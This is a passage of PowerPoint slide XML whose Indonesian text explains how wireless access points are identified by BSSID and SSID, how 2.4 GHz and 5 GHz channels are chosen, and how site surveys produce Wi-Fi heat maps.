              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (BSSID). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SSID).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada pita radio 2,4 GHz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 5 GHz. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pita radio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Survei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lokasi dan Peta Panas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diposisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumpang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Survei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Survei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Fitur-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kokoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, motor, oven microwave, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Laptop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>survei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik-titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> surveyor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembacaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
